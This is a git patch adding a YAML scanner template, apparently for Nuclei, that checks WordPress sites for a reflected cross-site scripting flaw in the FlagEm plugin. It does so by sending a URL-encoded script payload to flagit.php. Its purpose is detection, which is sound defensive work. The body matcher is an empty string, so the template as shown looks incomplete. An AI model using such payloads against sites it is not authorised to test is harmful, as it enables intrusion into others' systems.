From c751aca0598bbc685c820eeb9501fd3c4b13eba6 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 13 Jul 2021 18:15:43 +0700 Subject: [PATCH] Create wp-flagem-xss.yaml --- vulnerabilities/wordpress/wp-flagem-xss.yaml | 29 ++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-flagem-xss.yaml diff --git a/vulnerabilities/wordpress/wp-flagem-xss.yaml b/vulnerabilities/wordpress/wp-flagem-xss.yaml new file mode 100644 index 0000000000..bcd78b1677 --- /dev/null +++ b/vulnerabilities/wordpress/wp-flagem-xss.yaml @@ -0,0 +1,29 @@ +id: wp-flagem-xss + +info: + name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/38674 + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200